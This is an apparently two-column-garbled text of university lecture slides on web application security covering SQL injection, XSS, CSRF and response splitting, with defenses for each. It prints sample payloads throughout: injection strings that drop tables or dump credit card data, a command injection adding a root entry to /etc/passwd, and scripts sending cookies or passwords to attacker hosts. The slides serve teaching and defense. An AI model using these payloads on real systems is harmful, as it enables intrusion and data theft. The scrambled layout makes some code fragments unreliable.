CS 155 Spring 2009

Schematic web site architecture

WS1

Secure Web Site Design

Firewall

Firewall
Application
Load
Firewall WS2 App
Balancer DB
(WAF) Servers
WS3
John Mitchell
IDS
Authorization
Netegrity (CA)
Oblix (Oracle)

1 2

Web application code Common vulnerabilities

Runs on web server or app server. SQL Injection
„ Takes input from web users (via web server) „ Browser sends malicious input to server

„ Interacts with the database and 3rd parties. „ Bad input checking leads to malicious SQL query
Sans
„ Prepares results for users (via web server) Top XSS – Cross-site scripting
10
„ Bad
B d web b site
it sends
d innocent
i t victim
i ti a script
i t that
th t
Examples:
steals information from an honest web site
„ Shopping carts, home banking, bill pay, tax prep, …
CSRF – Cross-site request forgery
„ New code written for every web site.
„ Bad web site sends request to good web site, using
Written in: credentials of an innocent victim who “visits” site
„ C, PHP, Perl, Python, JSP, ASP, … Other problems
„ Often written with little consideration for security „ HTTP response splitting, site redirects, …

3 4

Dynamic Web Application

GET / HTTP/1.0
Browser

SQL Injection Web

server
HTTP/1.1 200 OK

index.php

with slides from Neil Daswani

Database
server

5 6

1
PHP: Hypertext Preprocessor SQL
Server scripting language with C-like syntax Widely used database query language
Can intermingle static HTML and code Fetch a set of records
<input value=<?php echo $myvalue; ?>> SELECT * FROM Person WHERE Username=‘grader’
Can embed variables in double-quote
double quote strings Add data to the table
$user = “world”; echo “Hello $user!”; INSERT INTO Person (Username, Zoobars)
or $user = “world”; echo “Hello” . $user . “!”; VALUES (‘grader’, 10)

Form data in global arrays $_GET, $_POST, … Modify data

UPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor

7 8

Example Basic picture: SQL Injection

Sample PHP Victim Server

$recipient = $_POST[‘recipient’];
1
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
2
$ = $db->executeQuery($sql);
$rs $db t Q ($ l)
unintended
Problem 3 receive valuable data query
Attacker
„ What if ‘recipient’ is malicious string that

changed the meaning of the query?

Victim SQL DB
9 10

CardSystems Attack April 2008 SQL Vulnerabilities

CardSystems
„ credit card payment processing company
„ SQL injection attack in June 2005
„ put company out of business

The Attack
„ 263,000 credit card #s stolen from database
„ credit card #s stored unencrypted
„ 43 million credit card #s exposed

11

2
Main steps in this attack Part of the SQL attack string
DECLARE @T varchar(255),@C varchar(255)
Use Google to find sites using a particular ASP style
DECLARE Table_Cursor CURSOR
vulnerable to SQL injection FOR select a.name,b.name from sysobjects a,syscolumns b where
Use SQL injection on these sites to modify the page to a.id=b.id and a.xtype='u' and
include a link to a Chinese site nihaorr1.com (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
Don
Don'tt visit this site yourself! OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
The site (nihaorr1.com) serves JavaScript that exploits WHILE(@@FETCH_STATUS=0) BEGIN
vulnerabilities in IE, RealPlayer, QQ Instant Messenger exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘ ''')
Steps (1) and (2) are automated in a tool that can be configured to FETCH NEXT FROM Table_Cursor INTO @T,@C
inject whatever you like into vulnerable sites END CLOSE Table_Cursor
There is some evidence that hackers may get paid for each visit to DEALLOCATE Table_Cursor;
nihaorr1.com DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);--
13 14

SQL Injection Examples

Type 1 Attack Example

Enter
Username
& SELECT passwd
Web Password FROM USERS
Web WHERE uname
Browser DB
Server IS ‘$username’
(Client)

Attacker will modify

15

Malicious input SQL Injection Examples

Malicious Query
Enter
Username SELECT passwd
& FROM USERS
Web Password WHERE uname
Web
Browser IS ‘’;; DROP TABLE DB
Server
(Client) USERS; -- ‘

Eliminates all user

Attacker Modifies Input accounts

17

3
What is SQL Injection? SQL Injection Examples
Input Validation Vulnerability
„ Untrusted user input in SQL query sent to back-end
View pizza order history:<br>
<form method="post" action="...">
database without sanitizing the data Month
<select>
<option name="month" value="1">Jan</option>
Specific case of more general command injection ...
„ Inserting untrusted input into a query or command <option name="month" value="12">Dec</option>
</select>
Year
Why is this Bad? <p>
<input type=submit name=submit value=View>
„ Data can be misinterpreted as a command </form>
„ Can alter the intended effect of command or query

Attacker can post form that is not generated by this page.

19 20

SQL Injection Examples SQL Injection Examples

Normal SELECT pizza, toppings, quantity, order_day
FROM orders
SQL WHERE userid=4123 All User Data
Query AND order_month=10 Compromised

Type 2 F order_month
For d h parameter,
t attacker
tt k could
ld iinputt
Attack
WHERE condition
0 OR 1=1 is always true!
Gives attacker access
to other users’
Malicious … private data!
Query WHERE userid=4123
AND order_month=0 OR 1=1

21 22

SQL Injection Examples SQL Injection Examples

A more damaging breach of user privacy:
For order_month parameter, attacker could input
0 AND 1=0 Credit Card Info
UNION SELECT cardholder, number, exp_month, exp_year Compromised
FROM creditcards

Attacker is able to
„ Combine the results of two queries

„ Empty table from first query with the sensitive

credit card info of all users from second query

23 24

4
More Attacks Second-Order SQL Injection
• Create new users: Second-Order SQL Injection: attack where data
‘; INSERT INTO USERS (‘uname’,’passwd’, stored in database is later used to conduct SQL
‘salt’) VALUES (‘hacker’,’38a74f’, 3234); injection

Example: this vulnerability could exist if string

• Password reset: escaping
i isi applied
li d inconsistently
i i t tl
‘; UPDATE USERS SET [email protected]
WHERE [email protected]
Solution: Treat ALL parameters as dangerous

UPDATE USERS SET passwd='cracked'

passwd='cracked'
WHERE uname='admin'
uname='admin' --'
--' attacker chooses
username 'admin' --
Strings not escaped!

26

Preventing SQL Injection Escaping Quotes

Input validation For valid string inputs like username o’connor, use
„ Filter escape characters
Š Apostrophes, semicolons, percent symbols, hyphens, „ Ex: escape(o’connor) = o’’connor
underscores, … „ only works for string inputs
Š Any character that has special meanings
„ Check
Ch k theth data
d t type
t (e.g.,
( make
k sure it’s
it’ an integer)
i t )
Whitelisting
„ Blacklisting chars doesn’t work

Š forget to filter out some characters

Š could prevent valid input (e.g. username O’Brien)
„ Allow only well-defined set of safe values

Š Set implicitly defined through regular expressions

28

Prepared Statements Prepared Statement:Example

Metacharacters (e.g. ‘) in queries provide distinction
between data & control PreparedStatement ps =
db.prepareStatement("SELECT pizza, toppings, quantity, order_day "
Most attacks: data interpreted as control / + "FROM orders WHERE userid=? AND order_month=?");
alters the semantics of a query/cmd ps.setInt(1, session.getCurrentUserId());
Bind Variables: ? placeholders guaranteed to be data pps.setInt(2,
( Integer.parseInt(request.getParamenter("month")));
g p ( q g ( )))
ResultSet res = ps.executeQuery();
(not control) Bind Variable:
Prepared Statements allow creation of static queries Data Placeholder
with bind variables → preserves the structure of • query parsed w/o parameters
intended query • bind variables are typed e.g. int, string, etc…*

29

5
 Parameterized SQL Mitigating Impacts
Build SQL queries by properly escaping args: ′ → \′ Prevent Schema & Information Leaks
Example: Parameterized SQL: (ASP.NET 1.1)
„ Ensures SQL arguments are properly escaped. Limit Privileges (Defense-in-Depth)
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE Encrypt
E tSSensitive
iti D Data
t stored
t d iin D
Database
t b
username = @User AND
password = @Pwd", dbConnection);
Harden DB Server and Host OS
cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] ); Apply Input Validation
cmd.ExecuteReader();

31 32

Other command injection

Example: PHP server-side code for sending email
$email = $_POST[“email”]
$subject = $_POST[“subject”] Cross Site Scripting (XSS)
system(“mail $email –s $subject < /tmp/joinmynetwork”)

Att k can postt

Attacker
http://yourdomain.com/mail.pl?
[email protected]&
subject=foo < /usr/passwd; ls

OR
http://yourdomain.com/mail.pl?
[email protected]&subject=foo;
echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Basic scenario: reflected XSS attack The setup

Attack Server User input is echoed into HTML response.
1

2
Example: search field
5 „ http://victim.com/search.php ? term = apple

„ search.php responds with:

Victim client <HTML> <TITLE> Search Results </TITLE>
<BODY>
Victim Server
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>

Is this exploitable?
36

6
Bad input Attack Server

Consider link: (properly URL encoded)

www.attacker.com
http://victim.com/search.php ? term = http://victim.com/search.php ?
<script> window.open( term = <script> ... </script>

“http://badguy.com?cookie = ” +
Victim client
document.cookie
document cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php Victim Server
www.victim.com
2. Victim.com returns <html>
<HTML> Results for <script> … Results for
</script> <script>
window.open(http://attacker.com?
3. Browser executes script: ... document.cookie ...)
Sends badguy.com cookie for victim.com </script>
37 </html>

So what? Much worse …

Why would user click on such a link? Attacker can execute arbitrary scripts in browser
„ Phishing email in webmail client (e.g. gmail).
„ Link in doubleclick banner ad Can manipulate any DOM component on victim.com
„ Control links on page
… manyy manyy ways
y to fool user into clicking
g
„ Control
C t l form
f fields
fi ld (e.g.
( password
d field)
fi ld) on this
thi
page and linked pages.
What if badguy.com gets cookie for victim.com ? Š Example: MySpace.com phishing attack injects
„ Cookie can include session auth for victim.com password field that sends password to bad guy.
Š Or other data intended only for victim.com
⇒ Violates same origin policy Can infect other users: MySpace.com worm.

39 40

What is XSS? Basic scenario: reflected XSS attack

Attack Server
An XSS vulnerability is present when an Email version
1
attacker can inject scripting code into pages
generated by a web application. 2
Methods for injecting
j g malicious code: 5
„ Reflected XSS (“type 1”)
Š the attack script is reflected back to the user as part of a User Victim
page from the victim site
„ Stored XSS (“type 2”) Server Victim
Š the attacker stores the malicious code in a resource
managed by the web application, such as a database
„ Others, such as DOM-based attacks

7
 2006 Example Vulnerability Adobe PDF viewer “feature”
(version <= 7.9)

Attackers contacted users via email and fooled them into

PDF documents execute JavaScript code
accessing a particular URL hosted on the legitimate PayPal http://path/to/pdf/file.pdf#whatever_name_
website.
you_want=javascript:code_here
Injected code redirected PayPal visitors to a page warning users
their accounts had been compromised.
compromised
Victims were then redirected to a phishing site and prompted to
enter sensitive financial data.
The code will be executed in the context of
the domain where the PDF files is hosted
This could be used against PDF files hosted
on the local filesystem

Source: http://www.acunetix.com/news/paypal.htm
http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html

Here’s how the attack works: And if that doesn’t bother you...
Attacker locates a PDF file hosted on website.com PDF files on the local filesystem:
Attacker creates a URL pointing to the PDF, with
JavaScript Malware in the fragment portion file:///C:/Program%20Files/Adobe/Acrobat%2
„ http://website.com/path/to/file.pdf#s=javascript:alert(”xss”);) 07.0/Resource/ENUtxt.pdf#blah=javascript:al
Attacker entices a victim to click on the link
ert("XSS");
If the victim has Adobe Acrobat Reader Plugin 7.0.x or
less, confirmed in Firefox and Internet Explorer, the JavaScript Malware now runs in local context
JavaScript Malware executes with the ability to read local files ...

Reflected XSS attack Stored XSS

Attack Server Attack Server

1
5
I j t
Inject
Storemalicious
bad stuff
User Victim User Victim script
Send bad stuff

Server Victim Download it Server Victim

Reflect it back

8
MySpace.com (Samy worm) Stored XSS using images
Users can post HTML on their pages Suppose pic.jpg on web server contains HTML !
„ MySpace.com ensures HTML contains no Š request for http://site.com/pic.jpg results in:
<script>, <body>, onclick, <a href=javascript://>
HTTP/1.1 200 OK
„ p within CSS tags:
… but can do Javascript g …
<div style=“background:url(‘javascript:alert(1)’)”> Content-Type: image/jpeg
And can hide “javascript” as “java\nscript” <html> fooled ya </html>

With careful javascript hacking: Š IE will render this as HTML (despite Content-Type)

„ Samy worm infects anyone who visits an infected

MySpace page … and adds Samy as a friend. • Consider photo sharing sites that support image uploads
• What if attacker uploads an “image” that is a script?
„ Samy had millions of friends within 24 hours.
http://namb.la/popular/tech.html

Untrusted script in Facebook apps DOM-based XSS (no server used)

Example page
<HTML><TITLE>Welcome!</TITLE>
Hi <SCRIPT>
User data var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos,do
cument URL length));
cument.URL.length));
</SCRIPT>
</HTML>
Works fine with this URL
http://www.example.com/welcome.html?name=Joe
User- But what about this one?
supplied http://www.example.com/welcome.html?name=
application <script>alert(document.cookie)</script>

Amit Klein ... XSS of the Third Kind

Lots more information about attacks Defenses at server

Attack Server
1

2
5

User Victim

Server Victim

Strangely, this is
not the cover of
the book ...

9
How to Protect Yourself (OWASP) Input data validation and filtering
The best way to protect against XSS attacks: Never trust client-side data
„ Ensure that your app validates all headers, cookies, query
strings, form fields, and hidden fields (i.e., all parameters) „ Best: allow only what you expect
against a rigorous specification of what should be allowed.
„ Do not attempt to identify active content and remove, filter,
Remove/encode special characters
or sanitize
i i it.
i There
Th are too many types off activei content „ Many encodings,
M di special
i l chars!
h !
and too many ways of encoding it to get around filters for
such content. „ E.g., long (non-standard) UTF-8 encodings
„ We strongly recommend a ‘positive’ security policy that
specifies what is allowed. ‘Negative’ or attack signature
based policies are difficult to maintain and are likely to be
incomplete.

Output filtering / encoding Illustrative example

Remove / encode (X)HTML special chars
„ &lt; for <, &gt; for >, &quot for “ …
Allow only safe commands (e.g., no <script>…)
Caution: `filter evasion` tricks
„ See XSS Cheat
S Ch t Sheet
Sh t for
f filter
filt evasion
i
„ E.g., if filter allows quoting (of <script> etc.), use
malformed quoting: <IMG “””><SCRIPT>alert(“XSS”)…
„ Or: (long) UTF-8 encode, or…
Caution: Scripts not only in <script>!

http://msdn.microsoft.com/en-us/library/aa973813.aspx

Why is this vulnerable to XSS? Analyze application

Use Case Scenario Inputs Input Scenario Output
Scenario Trusted? Outputs Contains
Untrusted
Input?
User adds User name, No Bookmark Yes
bookmark Description, written to file
Bookmark

Application User name No Thank you Yes

thanks user message page

User resets Button click event Yes None N/A

bookmark file

10
Select input encoding method Analyze application
Encoding Method Should Be Used If … Example/Pattern Use Case Scenario Input Scenario Output Requires Encoding
Scenario Inputs Trusted? Outputs Contains Encoding Method to
HtmlEncode Untrusted input is used in HTML output <a Untrusted Use
except when assigning to an HTML href="http://www.contoso.com">Click
attribute. Here [Untrusted input]</a> Input?
HtmlAttributeEncode Untrusted input is used as an HTML <hr noshade size=[Untrusted input]> User adds User name, No Bookmark Yes No (output
attribute bookmark Description, written to written to
JavaScriptEncode Untrusted input is used within a <script type="text/javascript"> … Bookmark file file not Web
JavaScript context [Untrusted input] response)
…
</script> Application User name No Thank you Yes Yes HtmlEncode
UrlEncode Untrusted input is used in a URL (such <a thanks user message
as a value in a querystring) href="http://search.msn.com/results.asp page
x?q=[Untrusted-input]">Click
Here!</a>
User resets Button click Yes None N/A N/A
XmlEncode Untrusted input is used in XML output, <xml_tag>[Untrusted input]</xml_tag>
bookmark event
except when assigning to an XML file
attribute
XmlAttributeEncode Untrusted input is used as an XML <xml_tag attribute=[Untrusted
attribute input]>Some Text</xml_tag>

Select output encoding method

Use Case Scenario Input Scenario Output Requires Encoding
Scenario Inputs Trusted? Outputs Contains Encoding Method to Use
Untrusted
Input?
User views Book- No Contributor, Yes Yes Name -
saved mark file description, HtmlEncode
bookmarks data and link
displayed in Description –
browser HtmlEncode

BookmarkLink
- input
validation.

Common encoding functions ASP.NET output filtering

validateRequest: (on by default)
PHP: htmlspecialchars(string) „ Crashes page if finds <script> in POST data.
& → &amp; " → &quot; ' → &#039; „ Looks for hardcoded list of patterns
< → &lt; > → &gt; „ Can be disabled: <%@ Page validateRequest=“false" %>

„ htmlspecialchars(
"<a href='test'>Test</a>", ENT_QUOTES);
Outputs:
&lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
ASP.NET 1.1:
„ Server.HtmlEncode(string)
Š Similar to PHP htmlspecialchars

See http://us3.php.net/htmlspecialchars

11
 Caution: Scripts not only in <script>! Problems with filters
JavaScript as scheme in URI Suppose a filter removes <script
„ <img src=“javascript:alert(document.cookie);”>
„ Good case
JavaScript On{event} attributes (handlers)
„ OnSubmit, OnError, OnLoad, … Š <script src=“ ...” → src=“...”
Typical use:
„ <img src=“none” OnError=“alert(document.cookie)”> „ But then
„ <iframe src=`https://bank.com/login` onload=`steal()`> Š <scr<scriptipt src=“ ...” → <script src=“ ...”
„ <form> action="logon.jsp" method="post"
onsubmit="hackImg=new Image;
hackImg.src='http://www.digicrime.com/'+document.for
ms(1).login.value'+':'+
document.forms(1).password.value;" </form>

Pretty good filter But watch out for tricky cases

function RemoveXSS($val) {
// this prevents some character re-spacing such as <java\0script>
$val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); Previous filter works on some input
// straight replacements ... prevents strings like <IMG „ Try it at
SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A
http://kallahar.com/smallprojects/php_xss_filter_function.php
&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search .== '1234567890!@#$%^&*()';
1234567890!@#$% &*() ; But consider this
$search .= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
$val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); java&#x09;script Blocked; &#x09 is horizontal tab
$val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
}
$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', ...); java&#x26;#x09;script → java&#x09;script
$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', ...);
$ra = array_merge($ra1, $ra2);
$found = true; // keep replacing as long as the previous round replaced something Instead of blocking this input, it is transformed to an attack
while ($found == true) { ...}
return $val; Need to loop and reapply filter to output until nothing found
}
http://kallahar.com/smallprojects/php_xss_filter_function.php

Advanced anti-XSS tools Client-side XSS defenses

Dynamic Data Tainting „ Proxy-based: analyze the HTTP traffic exchanged
between user’s web browser and the target web
„ Perl taint mode server by scanning for special HTML characters
Static Analysis and encoding them before executing the page on
the user’s web browser
„ A l
Analyze Java,
J PHP to
t ddetermine
t i possible
ibl
„ Application-level firewall: analyze browsed HTML
flow of untrusted input pages for hyperlinks that might lead to leakage of
sensitive information and stop bad requests using
a set of connection rules.
„ Auditing system: monitor execution of JavaScript
code and compare the operations against high-
level policies to detect malicious behavior

12
 IE 8 XSS Filter Points to remember
What can you do at the client? Key concepts
„ Whitelisting vs. blacklisting
„ Output encoding vs. input sanitization
Attack Server „ Sanitizing before or after storing in database
„ Dynamic
y a c versus
e sus static
stat c de
defense
e se tec
techniques
ques
5 Good ideas
„ Static analysis (e.g. ASP.NET has support for this)
User Victim „ Taint tracking
Server Victim
„ Framework support
„ Continuous testing
Bad ideas
„ Blacklisting
„ Manual sanitization
http://blogs.msdn.com/ie/archive/2008/07/01/ie8-security-part-iv-the-xss-filter.aspx

Recall: session using cookies

Browser Server

Cross Site Request Forgery

Basic picture Cross Site Request Forgery (XSRF)

Example:
Server Victim
„ User logs in to bank.com. Does not sign off.
„ Session cookie remains in browser state
1

„ Then user visits another site containing:

4
<form name=F action=http://bank.com/BillPay.php>
action=http://bank com/BillPay php>
2 <input name=recipient value=badguy> …
User Victim <script> document.F.submit(); </script>
„ Browser sends user auth cookie with request
Attack Server
Š Transaction will be fulfilled

Problem:
„ cookie auth is insufficient when side effects can occur
Q: how long do you stay logged on to Gmail?
77

13
Example: Home Router Attack on Home Router
[SRJ’07]
Fact:
Home router „ 50% of home users use a broadband router with a

default or no password
1
Drive-by Pharming attack: User visits malicious site
„ JavaScript at site scans home network looking for
4
broadband router:
2 • SOP allows “send only” messages
3 • Detect success using onerror:
User Bad web site Š <IMG SRC=192.168.0.1 onError = do() >
„ Once found, login to router and change DNS server
Problem: “send-only” access is sufficient to reprogram
79 router
80

Login CSRF CSRF Defenses

Secret token
„ Place nonce in page/form from honest site
„ Check nonce in POST
Š Confirm part of ongoing session with server
„ Token in POST can be HMAC of session ID in cookie
Check referer (sic) header
„ Referer header is provided by browser, not script
„ Unfortunately, often filtered for privacy reasons
Use custom headers via XMLHttpRequest
„ This requires global change in server apps

82

Login CSRF Referer header filtering

Cross-site HTTP

Same-site HTTP

Ad Network A
Cross-site TLS Ad Network B

Same-site TLS

0 2 4 6 8 10 12

14
Referer header filtering CSRF Recommendations
Login CSRF
„ Strict Referer validation
„ Login forms typically submit over HTTPS, not blocked
HTTPS sites, such as banking sites
„ Use strict Referer validation to protect against CSRF
Other
„ Use Ruby-on-Rails or other framework that implements
secret token method correctly
Future
„ Alternative to Referer with fewer privacy problems
„ Send only on POST, send only necessary data

86

HTTP Response Splitting: The setup

User input echoed in HTTP header.

Example: Language redirect page (JSP)

More server-side problems <% response.redirect(“/by_lang.jsp?lang=” +
request.getParameter(“lang”) ) %>
HTTP Response Splitting Browser sends http://.../by_lang.jsp ? lang=french
Site Redirects Server HTTP Response:
HTTP/1.1 302 (redirect)
Date: …
Location: /by_lang.jsp ? lang=french

Is this exploitable?
88

Bad input Bad input

HTTP response from server looks like:
Suppose browser sends:
HTTP/1.1 302 (redirect)
http://.../by_lang.jsp ? lang= Date: …
L
Location:
ti /b l
/by_lang.jsp
j ? l
lang= french
f h
“ french \n
Content-length: 0
Content-length: 0 \r\n\r\n
HTTP/1.1 200 OK
lang

HTTP/1.1 200 OK
Spoofed page ” (URL encoded) Content-length: 217

Spoofed page

89 90

15
So what? Redirects
What just happened: EZShopper.com shopping cart (10/2004):
„ Attacker submitted bad URL to victim.com http://…/cgi-bin/ loadpage.cgi ? page=url
Š URL contained spoofed page in it „ Redirects browser to url
„ Got back spoofed page
Redirects are common on manyy sites
„ Used to track when user clicks on external link
So what?
„ EZShopper uses redirect to add HTTP headers
„ Cache servers along path now store spoof of

victim.com Problem: phishing

„ Will fool any user using same cache server
http://victim.com/cgi-bin/loadpage ? page=phisher.com

Defense: don’t do that (use URL encoding…) „ Link to victim.com puts user at phisher.com
⇒ Local redirects should ensure target URL is local
91 92

Sample phishing email How does this lead to spoof page?

Link displayed
„ https://www.start.earthlink.net/track?billing.asp
Actual link in html email
„ source:https://start.earthlink.net/track?id=101fe8439
p // /
8a866372f999c983d8973e77438a993847183bca43d7
ad47e99219a907871c773400b8328898787762c&url=
http://202.69.39.30/snkee/billing.htm?session_id=84
95...
Website resolved to
„ http://202.69.39.30/snkee/billing.htm?session_id=84
95...

Web Application Firewalls

Help prevent some attacks we discuss today:
• Cross site scripting
Additional solutions • SQL Injection

• Form field tampering

• Cookie
C ki poisoning
i i
Sample products:
Imperva
Kavado Interdo
F5 TrafficShield
Citrix NetScaler
CheckPoint Web Intel

96

16
Code checking Summary
Blackbox security testing services: SQL Injection
„ Whitehatsec.com „ Bad input checking allows malicious SQL query

„ Known defenses address problem effectively

Automated blackbox testing tools: XSS – Cross-site scripting
„ Cenzic,
Cenzic Hailstorm „ Problem
P bl stems
t from
f echoing
h i untrusted
t t d input
i t
„ Spidynamic, WebInspect
„ Difficult to prevent; requires care, testing, tools, …
„ eEye, Retina
CSRF – Cross-site request forgery
„ Forged request leveraging ongoing session
Web application hardening tools:
„ Can be prevented (if XSS problems fixed)
„ WebSSARI [WWW’04] : based on information flow
„ Nguyen-Tuong [IFIP’05] : based on tainting
Other server vulnerabilities
„ Increasing knowledge embedded in frameworks,

97
tools, application development recommendations

99

17